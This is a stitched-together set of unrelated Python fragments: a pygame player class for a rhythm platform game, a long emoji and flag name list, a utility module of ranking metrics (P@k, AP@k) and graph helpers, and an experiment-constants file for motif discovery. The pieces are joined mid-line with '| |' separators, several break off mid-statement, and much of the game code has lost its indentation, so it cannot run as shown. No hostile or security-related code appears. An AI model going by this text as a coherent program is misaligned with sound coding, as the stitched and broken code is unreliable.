                                     self.player_spritesheet.get_image(130, 396, 66, 66),
                                     self.player_spritesheet.get_image(196, 396, 66, 66)]
        # Invincible + boost frames: [left, right].
        self.invinc_boost = [self.player_spritesheet.get_image(0, 330, 66, 66),
                             self.player_spritesheet.get_image(66, 330, 66, 66)]
# Reset player variables when starting gameplay
    def reset(self):
        """Reset all player state when (re)starting gameplay.

        Re-centres the player above the top of the screen and clears all
        motion, power-up, and status flags back to their starting values.
        """
        # Spawn centred horizontally, just above the visible area.
        self.pos.x = self.game.WIDTH / 2
        self.pos.y = -64
        # Zero all motion.
        self.vel.x = 0
        self.vel.y = 0
        self.acc.x = 0
        self.acc.y = 0
        # Clear status flags.
        self.alive = True
        self.won = False
        self.hit = False
        self.on_ground = False
        self.jumping = False
        self.jumped = False
        # Clear power-ups and pusher state.
        self.immune = False
        self.boosted = False
        self.pushed = False
        self.push_time = 0
# This method allows us to control our player. Heavy use of physics and kinematics.
def move(self):
# Reset acceleration, or else player ends up wobbling back and forth
self.acc.x = 0
self.acc.y = 0
# Apply gravity if player is not on a platform
if not self.on_ground:
self.acc.y = self.GRAVITY
# Check if any keyboard keys have been pressed. Modify acceleration/velocity accordingly.
pressed_keys = pygame.key.get_pressed()
if pressed_keys[K_LEFT] or pressed_keys[K_a]:
self.last_direction = False
self.play_walk = True
self.acc.x = -self.ACCELERATION
elif pressed_keys[K_RIGHT] or pressed_keys[K_d]:
self.last_direction = True
self.play_walk = True
self.acc.x = self.ACCELERATION
# Player is holding space key? Jump until max jump height is reached. Space key is let go? Stop jump.
if pressed_keys[K_SPACE] or pressed_keys[K_UP] or pressed_keys[K_w]:
self.jump()
self.jumping = True
self.play_jump = True
else:
self.cancel_jump()
self.jumping = False
self.play_jump = False
# Apply friction
if self.on_ground:
self.acc.x -= self.vel.x * self.FRICTION
else:
self.acc.x -= self.vel.x * self.AIR_FRICTION
# See if player was pushed
if self.pushed:
self.push()
self.pushed = False
# Basic kinematics. They all change based on the acceleration from above.
self.vel += self.acc
self.pos += self.vel + 0.5 * self.acc
# Apply maximum falling velocity
if self.vel.y > self.MAX_FALL_VELOCITY:
self.vel.y = self.MAX_FALL_VELOCITY
# Screen Warping. Player will wrap around screen borders. Can be removed with border acting as barrier.
if self.pos.x > self.game.WIDTH:
self.pos.x = self.pos.x - self.game.WIDTH
if self.pos.x < 0:
self.pos.x = self.game.WIDTH - self.pos.x
# Jump method first check if a player is on a platform before allowing player to jump
def jump(self):
if self.on_ground and not self.jumping:
self.jumped = True
if self.boosted:
self.vel.y = -30
self.boosted = False
self.game.assets["sfx_boostjump"].play()
else:
# On beat jump
if self.gameplay_screen.rhy_on_beat:
self.vel.y = -20
self.vel.x *= 2
self.game.assets["sfx_blip"].play()
if self.last_direction:
if self.immune:
self.surf = self.invinc_rhythm_frames[5]
else:
self.surf = self.rhythm_jump_frames[5]
else:
if self.immune:
self.surf = self.invinc_rhythm_frames[4]
else:
self.surf = self.rhythm_jump_frames[4]
# Off beat jump
else:
self.vel.y = -15
self.game.assets["sfx_jump"].play()
if self.last_direction:
if self.immune:
self.surf = self.invinc_jump_frames[1]
else:
self.surf = self.jump_frames[1]
else:
if self.immune:
self.surf = self.invinc_jump_frames[0]
else:
self.surf = self.jump_frames[0]
    def push(self):
        """Knock the player with a random upward kick and sideways shove.

        Called from move() after a pusher collision sets ``self.pushed``.
        Note: two randrange draws in a fixed order (vel.y first, then
        acc.x) — the order matters for reproducibility with a seeded RNG.
        """
        self.vel.y = random.randrange(-15, -5)
        self.acc.x = random.randrange(-15, 15)
def cancel_jump(self):
if self.jumping:
if self.vel.y < -5:
self.vel.y = -5
def animate_walk(self, direction_frames):
now = pygame.time.get_ticks()
if self.play_walk:
if now - self.last_update > 150:
self.last_update = now
self.current_frame = (self.current_frame + 1) % len(direction_frames)
self.surf = direction_frames[self.current_frame]
def animate(self, left_frames, right_frames):
if not self.play_walk and not self.play_jump:
if self.last_direction:
self.surf = right_frames[0]
else:
self.surf = left_frames[0]
elif self.play_walk:
if self.last_direction:
self.animate_walk(right_frames)
else:
self.animate_walk(left_frames)
def rhythm_jump_animate(self):
if not self.play_walk and not self.play_jump:
if self.last_direction:
if self.immune:
self.surf = self.invinc_rhythm_frames[2]
else:
self.surf = self.rhythm_jump_frames[1]
else:
if self.immune:
self.surf = self.invinc_rhythm_frames[0]
else:
self.surf = self.rhythm_jump_frames[0]
elif self.play_walk:
if self.last_direction:
if self.immune:
self.surf = self.invinc_rhythm_frames[3]
else:
self.surf = self.rhythm_jump_frames[3]
else:
if self.immune:
self.surf = self.invinc_rhythm_frames[1]
else:
self.surf = self.rhythm_jump_frames[2]
# Player platform collision detection & rhythm restart
def update(self):
self.jumped = False
# Update movement
self.move()
# Check for for player death if player falls off of screen
if self.pos.y > self.gameplay_screen.despawn_y:
self.alive = False
return
# Platform collisions
plat_collisions = pygame.sprite.spritecollide(self, self.gameplay_screen.platforms, False)
self.on_ground = False
# Ignore collisions if the player jumped this frame
if not self.jumped and plat_collisions:
for p in plat_collisions:
# Place the player on the platform if they are high enough (w/ vel forgiveness) and falling
if self.vel.y >= 0 and self.rect.bottom < p.rect.centery + self.vel.y:
# Set player to be slightly inside platform, otherwise they will jitter
self.pos.y = p.rect.top - ((self.rect.height / 2) - 0.1)
self.vel.y = 0
self.on_ground = True
# Set win if goal platform
if p.goal:
self.won = True
self.update_rect()
if self.boosted:
if self.last_direction:
if self.immune:
self.surf = self.invinc_boost[1]
else:
self.surf = self.player_boost_frames[1]
else:
if self.immune:
self.surf = self.invinc_boost[0]
else:
self.surf = self.player_boost_frames[0]
else:
cur_time = time.time()
# changes to rhythm jump animation when on beat
if self.gameplay_screen.rhy_on_beat:
self.rhythm_jump_animate()
else:
if self.immune:
self.animate(self.invinc_idle_walk_frames_l, self.invinc_idle_walk_frames_r)
else:
self.animate(self.idle_walk_frames_l, self.idle_walk_frames_r)
# Check if player hits powerups
pows_collisions = pygame.sprite.spritecollide(self, self.gameplay_screen.powerups, True)
for p in pows_collisions:
self.game.assets["sfx_pickup"].play()
if p.type == 'boost':
self.boosted = True
elif p.type == 'invincible':
self.immune = True
# Check if player hits enemy
enemy_collisions = pygame.sprite.spritecollide(self, self.gameplay_screen.enemies, True)
if enemy_collisions:
# If player is in IMMUNE STATE, will lose immunity after hitting 1 enemy
if self.immune:
self.game.assets["sfx_loseshield"].play()
self.immune = False
else:
self.game.assets["sfx_hit"].play()
self.hit = True
for e in enemy_collisions:
e.kill()
# Check if player hits a pusher
push_collisions = pygame.sprite.spritecollide(self, self.gameplay_screen.pushers, False)
for p in push_collisions:
# If player is in IMMUNE STATE, will lose immunity after hitting 1 enemy
if self.immune and time.time() - self.push_time > 1.0:
self.game.assets["sfx_loseshield"].play()
self.push_time = time.time()
self.immune = False
if p.active and time.time() - self.push_time > 1.0:
self.game.assets["sfx_pushed"].play()
self.push_time = time.time()
self.pushed = True
# Walking to Idle Animation transition
if self.last_pos.x + 0.005 >= self.pos.x >= self.last_pos.x - 0.005 and self.on_ground:
self.play_walk = | |
Heart on Fire'],
['❤️‍🩹', ' Mending Heart'],
['❤️', ' Red Heart'],
['🧡', ' Orange Heart'],
['💛', ' Yellow Heart'],
['💚', ' Green Heart'],
['💙', ' Blue Heart'],
['💜', ' Purple Heart'],
['🤎', ' Brown Heart'],
['🖤', ' Black Heart'],
['🤍', ' White Heart'],
['💯', ' Hundred Points'],
['💢', ' Anger Symbol'],
['💬', ' Speech Balloon'],
['👁️‍🗨️', ' Eye in Speech Bubble'],
['🗨️', ' Left Speech Bubble'],
['🗯️', ' Right Anger Bubble'],
['💭', ' Thought Balloon'],
['💤', ' Zzz'],
['💮', ' White Flower'],
['♨️', ' Hot Springs'],
['💈', ' Barber Pole'],
['🛑', ' Stop Sign'],
['🕛', ' Twelve O’Clock'],
['🕧', ' Twelve-Thirty'],
['🕐', ' One O’Clock'],
['🕜', ' One-Thirty'],
['🕑', ' Two O’Clock'],
['🕝', ' Two-Thirty'],
['🕒', ' Three O’Clock'],
['🕞', ' Three-Thirty'],
['🕓', ' Four O’Clock'],
['🕟', ' Four-Thirty'],
['🕔', ' Five O’Clock'],
['🕠', ' Five-Thirty'],
['🕕', ' Six O’Clock'],
['🕡', ' Six-Thirty'],
['🕖', ' Seven O’Clock'],
['🕢', ' Seven-Thirty'],
['🕗', ' Eight O’Clock'],
['🕣', ' Eight-Thirty'],
['🕘', ' Nine O’Clock'],
['🕤', ' Nine-Thirty'],
['🕙', ' Ten O’Clock'],
['🕥', ' Ten-Thirty'],
['🕚', ' Eleven O’Clock'],
['🕦', ' Eleven-Thirty'],
['🌀', ' Cyclone'],
['♠️', ' Spade Suit'],
['♥️', ' Heart Suit'],
['♦️', ' Diamond Suit'],
['♣️', ' Club Suit'],
['🃏', ' Joker'],
['🀄', ' Mahjong Red Dragon'],
['🎴', ' Flower Playing Cards'],
['🔇', ' Muted Speaker'],
['🔈', ' Speaker Low Volume'],
['🔉', ' Speaker Medium Volume'],
['🔊', ' Speaker High Volume'],
['📢', ' Loudspeaker'],
['📣', ' Megaphone'],
['📯', ' Postal Horn'],
['🔔', ' Bell'],
['🔕', ' Bell with Slash'],
['🎵', ' Musical Note'],
['🎶', ' Musical Notes'],
['💹', ' Chart Increasing with Yen'],
['🛗', ' Elevator'],
['🏧', ' ATM Sign'],
['🚮', ' Litter in Bin Sign'],
['🚰', ' Potable Water'],
['♿', ' Wheelchair Symbol'],
['🚹', ' Men’s Room'],
['🚺', ' Women’s Room'],
['🚻', ' Restroom'],
['🚼', ' Baby Symbol'],
['🚾', ' Water Closet'],
['⚠️', ' Warning'],
['🚸', ' Children Crossing'],
['⛔', ' No Entry'],
['🚫', ' Prohibited'],
['🚳', ' No Bicycles'],
['🚭', ' No Smoking'],
['🚯', ' No Littering'],
['🚱', ' Non-Potable Water'],
['🚷', ' No Pedestrians'],
['📵', ' No Mobile Phones'],
['🔞', ' No One Under Eighteen'],
['☢️', ' Radioactive'],
['☣️', ' Biohazard'],
['⬆️', ' Up Arrow'],
['↗️', ' Up-Right Arrow'],
['➡️', ' Right Arrow'],
['↘️', ' Down-Right Arrow'],
['⬇️', ' Down Arrow'],
['↙️', ' Down-Left Arrow'],
['⬅️', ' Left Arrow'],
['↖️', ' Up-Left Arrow'],
['↕️', ' Up-Down Arrow'],
['↔️', ' Left-Right Arrow'],
['↩️', ' Right Arrow Curving Left'],
['↪️', ' Left Arrow Curving Right'],
['⤴️', ' Right Arrow Curving Up'],
['⤵️', ' Right Arrow Curving Down'],
['🔃', ' Clockwise Vertical Arrows'],
['🔄', ' Counterclockwise Arrows Button'],
['🔙', ' Back Arrow'],
['🔚', ' End Arrow'],
['🔛', ' On! Arrow'],
['🔜', ' Soon Arrow'],
['🔝', ' Top Arrow'],
['🛐', ' Place of Worship'],
['⚛️', ' Atom Symbol'],
['🕉️', ' Om'],
['✡️', ' Star of David'],
['☸️', ' Wheel of Dharma'],
['☯️', ' Yin Yang'],
['✝️', ' Latin Cross'],
['☦️', ' Orthodox Cross'],
['☪️', ' Star and Crescent'],
['☮️', ' Peace Symbol'],
['🕎', ' Menorah'],
['🔯', ' Dotted Six-Pointed Star'],
['♈', ' Aries'],
['♉', ' Taurus'],
['♊', ' Gemini'],
['♋', ' Cancer'],
['♌', ' Leo'],
['♍', ' Virgo'],
['♎', ' Libra'],
['♏', ' Scorpio'],
['♐', ' Sagittarius'],
['♑', ' Capricorn'],
['♒', ' Aquarius'],
['♓', ' Pisces'],
['⛎', ' Ophiuchus'],
['🔀', ' Shuffle Tracks Button'],
['🔁', ' Repeat Button'],
['🔂', ' Repeat Single Button'],
['▶️', ' Play Button'],
['⏩', ' Fast-Forward Button'],
['⏭️', ' Next Track Button'],
['⏯️', ' Play or Pause Button'],
['◀️', ' Reverse Button'],
['⏪', ' Fast Reverse Button'],
['⏮️', ' Last Track Button'],
['🔼', ' Upwards Button'],
['⏫', ' Fast Up Button'],
['🔽', ' Downwards Button'],
['⏬', ' Fast Down Button'],
['⏸️', ' Pause Button'],
['⏹️', ' Stop Button'],
['⏺️', ' Record Button'],
['⏏️', ' Eject Button'],
['🎦', ' Cinema'],
['🔅', ' Dim Button'],
['🔆', ' Bright Button'],
['📶', ' Antenna Bars'],
['📳', ' Vibration Mode'],
['📴', ' Mobile Phone Off'],
['♀️', ' Female Sign'],
['♂️', ' Male Sign'],
['✖️', ' Multiply'],
['➕', ' Plus'],
['➖', ' Minus'],
['➗', ' Divide'],
['♾️', ' Infinity'],
['‼️', ' Double Exclamation Mark'],
['⁉️', ' Exclamation Question Mark'],
['❓', ' Question Mark'],
['❔', ' White Question Mark'],
['❕', ' White Exclamation Mark'],
['❗', ' Exclamation Mark'],
['〰️', ' Wavy Dash'],
['💱', ' Currency Exchange'],
['💲', ' Heavy Dollar Sign'],
['⚕️', ' Medical Symbol'],
['♻️', ' Recycling Symbol'],
['⚜️', ' Fleur-de-lis'],
['🔱', ' Trident Emblem'],
['📛', ' Name Badge'],
['🔰', ' Japanese Symbol for Beginner'],
['⭕', ' Hollow Red Circle'],
['✅', ' Check Mark Button'],
['☑️', ' Check Box with Check'],
['✔️', ' Check Mark'],
['❌', ' Cross Mark'],
['❎', ' Cross Mark Button'],
['➰', ' Curly Loop'],
['➿', ' Double Curly Loop'],
['〽️', ' Part Alternation Mark'],
['✳️', ' Eight-Spoked Asterisk'],
['✴️', ' Eight-Pointed Star'],
['❇️', ' Sparkle'],
['©️', ' Copyright'],
['®️', ' Registered'],
['™️', ' Trade Mark'],
['#️⃣', ' Keycap Number Sign'],
['*️⃣', ' Keycap Asterisk'],
['0️⃣', ' Keycap Digit Zero'],
['1️⃣', ' Keycap Digit One'],
['2️⃣', ' Keycap Digit Two'],
['3️⃣', ' Keycap Digit Three'],
['4️⃣', ' Keycap Digit Four'],
['5️⃣', ' Keycap Digit Five'],
['6️⃣', ' Keycap Digit Six'],
['7️⃣', ' Keycap Digit Seven'],
['8️⃣', ' Keycap Digit Eight'],
['9️⃣', ' Keycap Digit Nine'],
['🔟', ' Keycap: 10'],
['🔠', ' Input Latin Uppercase'],
['🔡', ' Input Latin Lowercase'],
['🔢', ' Input Numbers'],
['🔣', ' Input Symbols'],
['🔤', ' Input Latin Letters'],
['🅰️', ' A Button (Blood Type)'],
['🆎', ' AB Button (Blood Type)'],
['🅱️', ' B Button (Blood Type)'],
['🆑', ' CL Button'],
['🆒', ' Cool Button'],
['🆓', ' Free Button'],
['ℹ️', ' Information'],
['🆔', ' ID Button'],
['Ⓜ️', ' Circled M'],
['🆕', ' New Button'],
['🆖', ' NG Button'],
['🅾️', ' O Button (Blood Type)'],
['🆗', ' OK Button'],
['🅿️', ' P Button'],
['🆘', ' SOS Button'],
['🆙', ' Up! Button'],
['🆚', ' Vs Button'],
['🈁', ' Japanese “Here” Button'],
['🈂️', ' Japanese “Service Charge” Button'],
['🈷️', ' Japanese “Monthly Amount” Button'],
['🈶', ' Japanese “Not Free of Charge” Button'],
['🈯', ' Japanese “Reserved” Button'],
['🉐', ' Japanese “Bargain” Button'],
['🈹', ' Japanese “Discount” Button'],
['🈚', ' Japanese “Free of Charge” Button'],
['🈲', ' Japanese “Prohibited” Button'],
['🉑', ' Japanese “Acceptable” Button'],
['🈸', ' Japanese “Application” Button'],
['🈴', ' Japanese “Passing Grade” Button'],
['🈳', ' Japanese “Vacancy” Button'],
['㊗️', ' Japanese “Congratulations” Button'],
['㊙️', ' Japanese “Secret” Button'],
['🈺', ' Japanese “Open for Business” Button'],
['🈵', ' Japanese “No Vacancy” Button'],
['🔴', ' Red Circle'],
['🟠', ' Orange Circle'],
['🟡', ' Yellow Circle'],
['🟢', ' Green Circle'],
['🔵', ' Blue Circle'],
['🟣', ' Purple Circle'],
['🟤', ' Brown Circle'],
['⚫', ' Black Circle'],
['⚪', ' White Circle'],
['🟥', ' Red Square'],
['🟧', ' Orange Square'],
['🟨', ' Yellow Square'],
['🟩', ' Green Square'],
['🟦', ' Blue Square'],
['🟪', ' Purple Square'],
['🟫', ' Brown Square'],
['⬛', ' Black Large Square'],
['⬜', ' White Large Square'],
['◼️', ' Black Medium Square'],
['◻️', ' White Medium Square'],
['◾', ' Black Medium-Small Square'],
['◽', ' White Medium-Small Square'],
['▪️', ' Black Small Square'],
['▫️', ' White Small Square'],
['🔶', ' Large Orange Diamond'],
['🔷', ' Large Blue Diamond'],
['🔸', ' Small Orange Diamond'],
['🔹', ' Small Blue Diamond'],
['🔺', ' Red Triangle Pointed Up'],
['🔻', ' Red Triangle Pointed Down'],
['💠', ' Diamond with a Dot'],
['🔘', ' Radio Button'],
['🔳', ' White Square Button'],
['🔲', ' Black Square Button']
]
# noinspection SpellCheckingInspection
icons_flags = [
['🏁', ' Chequered Flag'],
['🚩', ' Triangular Flag'],
['🎌', ' Crossed Flags'],
['🏴', ' Black Flag'],
['🏳️', ' White Flag'],
['🏳️‍🌈', ' Rainbow Flag'],
['🏳️‍⚧️', ' Transgender Flag'],
['🏴‍☠️', ' Pirate Flag'],
['🇦🇨', ' Flag: Ascension Island'],
['🇦🇩', ' Flag: Andorra'],
['🇦🇪', ' Flag: United Arab Emirates'],
['🇦🇫', ' Flag: Afghanistan'],
['🇦🇬', ' Flag: Antigua & Barbuda'],
['🇦🇮', ' Flag: Anguilla'],
['🇦🇱', ' Flag: Albania'],
['🇦🇲', ' Flag: | |
"""
Commonly used utils:
evaluation metrics e.g. similarity, AUC, AP@k, MAP@k
graph related operation
testing data generator
file I/O
visualization
etc...
"""
import time
import numpy as np
from scipy import sparse
import pickle
import networkx as nx
# -----------------------------------------------------------------------------
# --------------------------------- metrics -----------------------------------
# -----------------------------------------------------------------------------
def cosine_similarity(a, b):
    """Cosine similarity between two vectors; usable as a score function.

    Operates vector by vector; for all-pairs similarity the vectorized
    pairwise_similarity() implementation is more efficient.

    a, b: array-like; flattened to 1-D before comparison.
    Returns 0.0 when either vector has zero norm (avoids division by zero).

    Fixes over the previous version: the docstring was placed after the
    import statements (making it a no-op string rather than a real
    docstring), the function-local imports duplicated the module-level
    numpy import, and each norm was computed twice.
    """
    a = np.reshape(a, -1)
    b = np.reshape(b, -1)
    denom = np.linalg.norm(a) * np.linalg.norm(b)
    if denom == 0:
        return 0.0
    return np.dot(a, b) / denom
def pairwise_similarity(mat, type='cosine'):
    ''' pairwise similarity; can be used as score function;
        vectorized computation
        mat: 2-D array or scipy sparse matrix, one sample per row
        type: 'cosine' | 'jaccard' | 'euclidean' | 'manhattan'
        For the distance-based types the *negated* distance is returned so
        that "larger = more similar" holds uniformly across all types.
    '''
    if type == 'cosine': # support sparse and dense mat
        from sklearn.metrics.pairwise import cosine_similarity
        result = cosine_similarity(mat, dense_output=True) # dense_output=True yields a dense ndarray
    elif type == 'jaccard':
        # NOTE(review): jaccard_similarity_score was removed from
        # scikit-learn (deprecated in 0.21, gone in 0.23); this branch only
        # works with an old pinned sklearn version — confirm the pin.
        from sklearn.metrics import jaccard_similarity_score
        from sklearn.metrics.pairwise import pairwise_distances
        # n_jobs=-1 means using all CPU for parallel computing
        result = pairwise_distances(mat.todense(), metric=jaccard_similarity_score, n_jobs=-1)
    elif type == 'euclidean':
        from sklearn.metrics.pairwise import euclidean_distances
        # note: similarity = - distance
        result = euclidean_distances(mat)
        result = -result
    elif type == 'manhattan':
        from sklearn.metrics.pairwise import manhattan_distances
        # note: similarity = - distance
        result = manhattan_distances(mat)
        result = -result
    else:
        # NOTE(review): returning the string 'Not found!' is easy to miss
        # downstream; raising ValueError would be safer — confirm no caller
        # depends on the sentinel string before changing it.
        print('Please choose from: cosine, jaccard, euclidean or manhattan')
        return 'Not found!'
    return result
def auc_score(y_true, y_score):
    """ROC-AUC via the sklearn roc_auc_score API.

    y_true & y_score: array-like, shape = [n_samples].

    NOTE: in the static setting one could mirror the prediction when the
    score falls below 0.5 (binary case), but that trick is questionable in
    the dynamic case, so the raw score is returned unchanged.
    """
    from sklearn.metrics import roc_auc_score
    return roc_auc_score(y_true=y_true, y_score=y_score)
def ranking_precision_score(y_true, y_score, k=10):
    """Precision at rank k (P@k).

    y_true & y_score: array-like, shape = [n_samples].
    Based on https://gist.github.com/mblondel/7337391, but — following
    https://ieeexplore.ieee.org/document/8329541 — the count of relevant
    items in the top k is divided by k itself rather than min(n_pos, k).

    >>> y_true = [1, 0, 1, 0, 1, 0, 0, 0, 1]
    >>> y_score = [0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1]
    >>> ranking_precision_score(y_true, y_score, k=5)
    0.6
    """
    if k == 0:
        return 0
    # Label 1 marks a relevant item. Hard-coded (rather than derived via
    # np.unique) so zero-degree nodes with a single class do not break.
    pos_label = 1
    # Indices of the k highest scores, best first.
    top_k_idx = np.argsort(y_score)[::-1][:k]
    top_k_labels = np.take(y_true, top_k_idx)
    n_relevant = np.sum(top_k_labels == pos_label)
    return float(n_relevant) / k
def average_precision_score(y_true, y_score, k=10):
    """Average precision at rank k (AP@k).

    y_true & y_score: array-like, shape = [n_samples].
    Based on https://gist.github.com/mblondel/7337391, but — following
    https://ieeexplore.ieee.org/document/8329541 — the sum of P@i over the
    relevant positions i <= k is divided by the number of relevant items
    actually retrieved in the top k (not by n_pos).

    Improvement over the previous version: a running hit count replaces
    the nested re-scan of the prefix for every hit, reducing the cost from
    O(k^2) to O(k) with identical results.

    >>> y_true = [1, 0, 1, 0, 1, 0, 0, 0, 1]
    >>> y_score = [0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1]
    >>> average_precision_score(y_true, y_score, k=1)
    1.0
    """
    # Label 1 marks a relevant item; hard-coded so zero-degree (single
    # class) cases do not break.
    pos_label = 1
    # Labels of the k highest-scoring predictions, best first.
    order = np.argsort(y_score)[::-1][:k]
    y_pred_true = np.asarray(y_true)[order]
    score = 0.0
    n_relevant = 0  # running count of relevant items in the prefix
    for i, label in enumerate(y_pred_true):
        if label == pos_label:
            n_relevant += 1
            # P@(i+1) computed incrementally: hits so far / prefix length.
            score += n_relevant / (i + 1.0)
    if n_relevant == 0:
        return 0
    return score / float(n_relevant)
def pk_and_apk_score(y_true, y_score, k_list):
    ''' Compute precision@k (P@k) and average precision@k (AP@k) together.

    y_true : binary relevance labels (1 = relevant / positive)
    y_score : predicted scores; items are ranked from high to low score
    k_list : list of cutoffs, e.g., k_list=[10] or k_list=[10, 100, 1000, ...]

    Returns (pk_list, apk_list), one entry per k in k_list.

    e.g.
    y_true = [1, 0, 1, 0, 1, 0, 0, 0, 1]
    y_score = [0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1]
    k_list = [1,2,3,4,5,6,7,8,9]
    pk_and_apk_score(y_true, y_score, k_list) ->
    [1.0, 0.5, 0.6666666666666666, 0.5, 0.6, 0.5, 0.42857142857142855, 0.375, 0.4444444444444444],
    [1.0, 1.0, 0.8333333333333333, 0.8333333333333333, 0.7555555555555555, 0.7555555555555555, 0.7555555555555555, 0.7555555555555555, 0.6777777777777778]
    '''
    pos_label = 1
    order = np.argsort(y_score)[::-1]  # rank indices once for all k; highest score first
    pk_list = []
    apk_list = []
    for k in k_list:
        y_pred_true = np.take(y_true, order[:k])  # true labels of the top-k ranked items
        n_relevant = np.sum(y_pred_true == pos_label)
        # P@k = (# relevant in top-k) / k
        if k == 0:
            pk_list.append(0)
        else:
            pk_list.append(float(n_relevant) / k)
        # AP@k: a running hit count gives P@i at each relevant position in O(k),
        # replacing the original O(k^2) recount of relevant items per position.
        hits = 0
        ap_sum = 0.0
        for i, label in enumerate(y_pred_true):
            if label == pos_label:
                hits += 1
                ap_sum += hits / (i + 1.0)  # P@(i+1); i starts from 0
        if n_relevant == 0:
            apk_list.append(0)
        else:
            apk_list.append(ap_sum / float(n_relevant))  # AP@k
    return pk_list, apk_list
# ----------------------------------------------------------------------------------
# ------------------------------- graph related operation --------------------------
# ----------------------------------------------------------------------------------
def edge_s1_minus_s0(s1, s0, is_directed=False):
    ''' Set difference of two edge (node-pair) collections: edges in s1 but not in s0.
    For the undirected case each pair is first put into canonical (small, large)
    order, so (a, b) and (b, a) count as the same edge.
    '''
    if is_directed:
        # directed edges are not handled yet; implicitly yields None
        print('currently not support directed case')
        return None
    canonical = lambda pairs: {(u, v) if u < v else (v, u) for u, v in pairs}
    return canonical(s1) - canonical(s0)
def unique_nodes_from_edge_set(edge_set):
    ''' Take out unique nodes from an edge set, preserving first-seen order.

    Uses a `seen` set for O(1) membership tests instead of scanning the
    result list for every node (the original was O(n^2) for n nodes).
    '''
    seen = set()
    unique_nodes = []
    for a, b in edge_set:
        for node in (a, b):
            if node not in seen:
                seen.add(node)
                unique_nodes.append(node)
    return unique_nodes
def row_as_probdist(mat, dense_output=False, preserve_zeros=False):
    '''Make each row of matrix sums up to 1.0, i.e., a probability distribution.
    Support both dense and sparse matrix.

    Attributes
    ----------
    mat : scipy sparse matrix or dense matrix or numpy array
        The matrix to be normalized
    dense_output : bool
        whether forced dense output
    preserve_zeros : bool
        If False, for row with all entries 0, we normalize it to a vector with all entries 1/n.
        Leave 0 otherwise

    Returns
    -------
    dense or sparse matrix:
        return dense matrix if input is dense matrix or numpy array
        return sparse matrix for sparse matrix input
        (note: np.array & np.matrix are diff; and may cause some dim issues...)
    '''
    row_sum = np.array(mat.sum(axis=1)).ravel()  # type: np.array
    zero_rows = row_sum == 0  # boolean mask of all-zero rows
    row_sum[zero_rows] = 1  # avoid division by zero; those rows stay all-zero after scaling
    # left-multiply by diag(1/row_sum) to rescale every row to sum 1
    diag = sparse.dia_matrix((1 / row_sum, 0), (mat.shape[0], mat.shape[0]))
    mat = diag.dot(mat)
    if not preserve_zeros:
        # outer product: adds a uniform 1/n distribution onto each all-zero row
        mat += sparse.csr_matrix(zero_rows.astype(int)).T.dot(sparse.csr_matrix(np.repeat(1 / mat.shape[1], mat.shape[1])))
    if dense_output and sparse.issparse(mat):
        return mat.todense()
    return mat
# ----------------------------------------------------------------------------
# --------------------------------- files I/O --------------------------------
# ----------------------------------------------------------------------------
def load_any_obj_pkl(path):
    ''' Deserialize and return the object stored in the pickle file at `path`.
    '''
    with open(path, 'rb') as fin:
        return pickle.load(fin)
def save_any_obj_pkl(obj, path):
    ''' Serialize `obj` to `path` using the highest available pickle protocol.
    '''
    with open(path, 'wb') as fout:
        pickle.dump(obj, fout, protocol=pickle.HIGHEST_PROTOCOL)
def save_emb(emb_dict, path):
''' save embeddings to | |
#!/usr/env/python
# This file was used to run official experiments
import os
import sys
import numpy as np
import pandas as pd
from ..datasets.datasets import DataLoader
from ..utils import learn
from ..utils.files import ensureDirExists
from ..utils.misc import nowAsString
from estimators import * # TODO don't do this
# ================================================================ Constants

# Output directories; the 'official' dirs are commented out so stray runs
# don't overwrite published results.
# OFFICIAL_SAVE_DIR_FIG = 'figs/official/'
# OFFICIAL_SAVE_DIR_RESULTS = 'results/official/'
OFFICIAL_SAVE_DIR_FIG = 'figs/unofficial/'
OFFICIAL_SAVE_DIR_RESULTS = 'results/unofficial/'

# ------------------------ Default extractor / preprocessing parameters
DEFAULT_DOWNSAMPLE_BY = 2
DEFAULT_LENGTHS = [1./20, 1./10]
DEFAULT_LENGTH_STEP = 5
DEFAULT_FRACTIONS_NOISE_DIMS = [1.] # run with orig data separately
DEFAULT_FRACTIONS_ADVERSARIAL_DIMS = [1.]

# ------------------------ Algorithms
# String keys selecting a motif-discovery algorithm.
ALGO_MDL = 'mdl'
ALGO_MINNEN = 'minnen'
ALGO_OUTCAST = 'outcast'
ALGO_FF = 'ff'
ALL_ALGORITHMS = [ALGO_MDL, ALGO_MINNEN, ALGO_FF] # ignore outcast

# Default parameter grids (dict-of-lists form consumed by learn.tryParams)
# for each algorithm.
DEFAULT_MINNEN_PARAMS = [{
    'lengthStep': [DEFAULT_LENGTH_STEP],
    'threshAlgo': ['minnen'],
}]
DEFAULT_MDL_PARAMS = [{
    'lengthStep': [DEFAULT_LENGTH_STEP],
    'threshAlgo': ['mdl'],
    'mdlBits': [6],
    'mdlAbandonCriterion': ['allNegative'],
}]
DEFAULT_FF_PARAMS = [{
    'includeLocalSlope': [True],
    'detrend': [True],
    'ignoreFlat': [True]
}]
PARAMS_FOR_ALGO = {
    ALGO_MINNEN: DEFAULT_MINNEN_PARAMS,
    ALGO_MDL: DEFAULT_MDL_PARAMS,
    ALGO_FF: DEFAULT_FF_PARAMS
}

# ------------------------ Dataset names
DATASET_MSRC = 'msrc'
DATASET_TIDIGITS = 'tidigits'
DATASET_UCR = 'ucr'
DATASET_UCR_PAIRS = 'ucr_pairs'
DATASET_DISHWASHER = 'dishwasher'
DATASET_DISHWASHER_2 = 'dishwasher_2'
DATASET_DISHWASHER_3 = 'dishwasher_3'
DATASET_DISHWASHER_SHORT = 'dishwasher_short'
DATASET_DISHWASHER_GROUPS = 'dishwasher_groups'
DATASET_DISHWASHER_PAIRS = 'dishwasher_pairs'
DATASET_TRIANGLES = 'triangles'
DATASET_RECTS = 'rects'
DATASET_SINES = 'sines'
DATASET_SHAPES = 'shapes'
DATASET_SYNTHETIC = 'synthetic'
DATASET_RAND_WALK = 'randwalk'

# ------------------------ Dataset params
# Fixed seeds keep dev and test runs reproducible.
DEV_SEED = 12345
TEST_SEED = 123
SEED = DEV_SEED
# SEED = TEST_SEED
DEFAULT_INSTANCES_PER_TS = 5
MSRC_PARAMS = [{'datasetName': ['msrc'],
                'whichExamples': [None],
                'seed': [SEED]
                }]
TIDIGITS_PARAMS = [{'datasetName': ['tidigits_grouped_mfccs'],
                    'whichExamples': [None],
                    'instancesPerTs': [DEFAULT_INSTANCES_PER_TS],
                    'seed': [SEED]
                    }]
UCR_TS_PER_DATASET = 50
